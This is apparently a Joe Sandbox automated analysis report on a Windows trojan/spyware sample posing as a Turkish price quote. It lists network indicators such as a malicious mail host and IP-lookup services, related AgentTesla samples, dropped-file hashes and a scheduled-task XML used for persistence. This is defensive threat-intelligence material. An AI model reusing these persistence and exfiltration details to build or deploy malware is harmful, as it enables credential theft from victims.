http://x1.c.lencr.org/0	F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000008.00000002.4148813369.00000000028B6000.00000004.00000800.00020000.00000000.sdmp, F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000008.00000002.4146072478.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, cYDnGbgU.exe, 0000000D.00000002.4149137493.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, cYDnGbgU.exe, 0000000D.00000002.4146200410.000000000148A000.00000004.00000020.00020000.00000000.sdmp, cYDnGbgU.exe, 0000000D.00000002.4146200410.00000000014B0000.00000004.00000020.00020000.00000000.sdmp, cYDnGbgU.exe, 0000000D.00000002.4160825037.0000000006D16000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://x1.i.lencr.org/0	F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000008.00000002.4148813369.00000000028B6000.00000004.00000800.00020000.00000000.sdmp, F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000008.00000002.4146072478.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, cYDnGbgU.exe, 0000000D.00000002.4149137493.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, cYDnGbgU.exe, 0000000D.00000002.4146200410.000000000148A000.00000004.00000020.00020000.00000000.sdmp, cYDnGbgU.exe, 0000000D.00000002.4146200410.00000000014B0000.00000004.00000020.00020000.00000000.sdmp, cYDnGbgU.exe, 0000000D.00000002.4160825037.0000000006D16000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/	F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758140522.00000000066A2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ip-api.com	F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000008.00000002.4148813369.0000000002871000.00000004.00000800.00020000.00000000.sdmp, cYDnGbgU.exe, 0000000D.00000002.4149137493.0000000003361000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/DPlease	F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758140522.00000000066A2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758140522.00000000066A2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fonts.com	F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758140522.00000000066A2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sandoll.co.kr	F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758140522.00000000066A2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758140522.00000000066A2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758140522.00000000066A2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1755412576.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000008.00000002.4148813369.0000000002821000.00000004.00000800.00020000.00000000.sdmp, cYDnGbgU.exe, 00000009.00000002.1794251648.0000000002FDD000.00000004.00000800.00020000.00000000.sdmp, cYDnGbgU.exe, 0000000D.00000002.4149137493.0000000003311000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sakkal.com	F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758140522.00000000066A2000.00000004.00000800.00020000.00000000.sdmp, F#U0130YAT TEKL#U0130F#U0130-2400.exe, 00000000.00000002.1758054376.0000000004F70000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	true
192.250.227.28	mail.usgrovemall.com	United States	36454	CNSV-LLCUS	true
172.67.74.152	api.ipify.org	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1515067
Start date and time:	2024-09-21 15:56:25 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 44s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	F#U0130YAT TEKL#U0130F#U0130-2400.exe renamed because original name is a hash value
Original Sample Name:	FYAT TEKLF-2400.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@19/15@3/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 202 Number of non-executed functions: 24
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:57:19	API Interceptor	8032614x Sleep call for process: F#U0130YAT TEKL#U0130F#U0130-2400.exe modified
09:57:21	API Interceptor	35x Sleep call for process: powershell.exe modified
09:57:24	API Interceptor	5623277x Sleep call for process: cYDnGbgU.exe modified
14:57:21	Task Scheduler	Run new task: cYDnGbgU path: C:\Users\user\AppData\Roaming\cYDnGbgU.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	Invoice_0167562.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	RFQ.vbs	Get hash	malicious	PXRECVOWEIWOEI Stealer, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
	printui.dll	Get hash	malicious	Unknown	Browse	ip-api.com/json/
	Inquiry-Dubai.js	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
	ungziped_file.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	ip-api.com/line/?fields=hosting
	VtkzI2DleKAWijQ.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	Comprobante_98756.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	comprobante_swift0000099.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	FaturaHat#U0131rlatma.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	Facturas de pago 003839,72011,030184.bat.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
192.250.227.28	quotation.doc	Get hash	malicious	Unknown	Browse	goupbuy.com/aDJt8sVp3dLARdJlt.exe
192.250.227.28	SecuriteInfo.com.Exploit.CVE-2017-11882.123.30974.7732.rtf	Get hash	malicious	AgentTesla	Browse	goupbuy.com/FaVp3Qd7etTM1bkon.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ip-api.com	Invoice_0167562.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	RFQ.vbs	Get hash	malicious	PXRECVOWEIWOEI Stealer, PureLog Stealer	Browse	208.95.112.1
	printui.dll	Get hash	malicious	Unknown	Browse	208.95.112.1
	Inquiry-Dubai.js	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	ungziped_file.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
	VtkzI2DleKAWijQ.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Comprobante_98756.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	comprobante_swift0000099.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	FaturaHat#U0131rlatma.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Facturas de pago 003839,72011,030184.bat.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
mail.usgrovemall.com	SNu4RXZpoS.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	192.250.227.28
mail.usgrovemall.com	e-DEKONT.exe	Get hash	malicious	AgentTesla	Browse	192.250.227.28
api.ipify.org	SPW AW25 - PO.010 SMS.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	SPW AW25 - PO.010 SMS.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	Invoice_0167562.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	https://dionthompson.com/a/?ThiNTMtNGYyOS1hNDc1LTA2YWQzNmJkNDc5ZQAQAIGKzFxi43JDqxvx%2BxZRlAU%3D	Get hash	malicious	HTMLPhisher	Browse	172.67.74.152
	RFQ_PO_KMM7983972_ORDER_DETAILS.js	Get hash	malicious	AgentTesla, RedLine	Browse	104.26.12.205
	MV ALIADO - S-REQ-19-00064.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	ORDER_DOCUMENT_PO_GQB793987646902.TXT.MPEG.PNG.CMD.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse	104.26.12.205
	CB5BlW3lBc.ps1	Get hash	malicious	AsyncRAT	Browse	104.26.13.205
	yLIMUr0fMI.ps1	Get hash	malicious	AsyncRAT	Browse	172.67.74.152
	nV2rYpqDsP.ps1	Get hash	malicious	AsyncRAT, PureLog Stealer	Browse	172.67.74.152

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CNSV-LLCUS	https://sesworld.com.au:443/it/mount/	Get hash	malicious	Unknown	Browse	192.250.235.25
	https://hmchive.com/?hcv=bGFldGl0aWEucGF0cnktYmFsYXRAc3VlZHp1Y2tlcmdyb3VwLmNvbS0tLS1DYXJsb3MgR2FpdMOhbg==	Get hash	malicious	Unknown	Browse	192.250.227.21
	z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe	Get hash	malicious	FormBook	Browse	192.250.231.28
	https://sgsconsulting.com/	Get hash	malicious	Unknown	Browse	192.250.227.23
	https://sgsconsulting.com/	Get hash	malicious	Unknown	Browse	192.250.227.23
	http://linkplea.se/doar	Get hash	malicious	Unknown	Browse	192.250.229.80
	rfq_commercial_order_GMlist_for_Drumedis_tender_august_quater_2024.vbs	Get hash	malicious	GuLoader, Remcos	Browse	192.250.234.170
	https://kanomama.com/KFKFLDRFKLEK?///RG9tYWluXFVzZXJuYW1lQGRvbWFpbi5jb20=	Get hash	malicious	HTMLPhisher	Browse	192.250.229.40
	Novi upit #876567-AWB.exe	Get hash	malicious	FormBook	Browse	192.250.227.27
	z1PEDIDODECOMPRAURGENTE.exe	Get hash	malicious	FormBook	Browse	192.250.231.28
TUT-ASUS	Invoice_0167562.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	RFQ.vbs	Get hash	malicious	PXRECVOWEIWOEI Stealer, PureLog Stealer	Browse	208.95.112.1
	printui.dll	Get hash	malicious	Unknown	Browse	208.95.112.1
	Inquiry-Dubai.js	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	ungziped_file.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
	VtkzI2DleKAWijQ.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Comprobante_98756.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	comprobante_swift0000099.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	FaturaHat#U0131rlatma.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Facturas de pago 003839,72011,030184.bat.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
CLOUDFLARENETUS	9B10a4bkpu.elf	Get hash	malicious	Mirai	Browse	8.44.48.224
	Order list.docx.doc	Get hash	malicious	Remcos, PureLog Stealer	Browse	188.114.96.3
	JaborSetup.exe	Get hash	malicious	Unknown	Browse	104.17.25.14
	KByiiYyiam.exe	Get hash	malicious	LummaC	Browse	104.21.20.40
	B0bHdMDGIN.exe	Get hash	malicious	LummaC	Browse	104.21.20.40
	AD3SI7tuzs.exe	Get hash	malicious	LummaC	Browse	104.21.20.40
	Meenakshi pdf lnk.lnk	Get hash	malicious	Unknown	Browse	104.26.9.129
	HkJrUQS8Oh.exe	Get hash	malicious	LummaC	Browse	172.67.191.81
	SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe	Get hash	malicious	NetSupport RAT	Browse	104.26.0.231
	SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Get hash	malicious	Amadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog Stealer	Browse	172.67.74.161

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	lylhDVrnR3.exe	Get hash	malicious	Unknown	Browse	172.67.74.152
	Meenakshi pdf lnk.lnk	Get hash	malicious	Unknown	Browse	172.67.74.152
	lylhDVrnR3.exe	Get hash	malicious	Unknown	Browse	172.67.74.152
	SPW AW25 - PO.010 SMS.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	SPW AW25 - PO.010 SMS.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	file.exe	Get hash	malicious	XWorm	Browse	172.67.74.152
	new shipment details.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.74.152
	Order.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.74.152
	details.exe	Get hash	malicious	VIP Keylogger	Browse	172.67.74.152
	vSH3wxvvyb.zip	Get hash	malicious	Unknown	Browse	172.67.74.152

Process:	C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\cYDnGbgU.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\cYDnGbgU.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.379401388151058
Encrypted:	false
SSDEEP:	48:fWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMugeoPUyus:fLHxvIIwLgZ2KRHWLOugYs
MD5:	4689846024D89F5AABDFA55655DD43FD
SHA1:	5DD556AC947F43C65A1631A3EB5B03E423EEC5DD
SHA-256:	83F556E6E19E0D478D948D3A10DE7B41E7CE8B50C3E7C120AD14E840B7F2BA28
SHA-512:	EC405FBE30E70D7A9A65E8906A47B4D8690ED7F60915BCA064712CC0EEA33002F45A9C412A7D9198499A9CA39A14FCB05EC5CC7D3F2B80BA0D1FEF3107261D59
Malicious:	false
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1b0u5lci.axx.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3pvbbt4a.q02.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cdqy43ny.qki.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eyvn1cx1.4ko.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ineb0hdf.0j1.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iu2k0ppq.5iv.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kqsi2qr4.ypv.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oty4fs3k.q2i.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp38F1.tmp

Download File

Process:	C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1574
Entropy (8bit):	5.111806538271757
Encrypted:	false
SSDEEP:	24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaWxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTjv
MD5:	7BCE54627A8AA7FD77FF2C7B8135FE83
SHA1:	36BEC3A706ECC1A5759579FCE9066EA80979F43B
SHA-256:	84A5A106AA699E5D689A33BDC248B9021CEFC38F45A1CFC93EF618A17F676943
SHA-512:	BE80466AFCFA2B66B286D701E444FAEDE148A5DA4244809BEF8FFDCD235E354DC3A55A372091CD6B6BD2EA8CD20C578E64A79BDDD9893E50DCCAE9B0D8CC03FD
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Local\Temp\tmp4A37.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\cYDnGbgU.exe
